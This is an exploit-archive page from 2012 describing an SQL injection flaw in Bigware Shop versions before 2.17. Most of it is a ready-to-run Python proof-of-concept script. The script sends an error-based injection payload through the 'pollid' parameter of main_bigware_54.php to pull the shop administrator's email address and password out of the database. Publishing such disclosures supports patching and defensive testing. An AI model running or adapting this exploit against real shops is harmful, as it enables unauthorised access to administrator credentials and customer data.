Bigware Shop 2.1x – ‘main_bigware_54.php’ SQL Injection

  • 作者: rwenzel
    日期: 2012-06-05
  • 类别:
  • 来源:
  • source:
    Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
    A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    Bigware Shop versions prior to 2.17 are vulnerable. 
    # -*- coding: utf-8 -*-
    import httplib2
    import urllib
    import sys
    # insert your target link here (with trailing slash)
    url = ""
    h = httplib2.Http()
    # send sql injection
    headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
    sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
     former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
    postdata = {'voteid' : '2', \
    'pollid' : sqli, \
    'x' : '1', \
    'y' : '1', \
    'forwarder' : ''}
    response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
    print content, "\n", "\n"
    print "If there is an error stating the duplicate admin entry, your shop is vulnerable."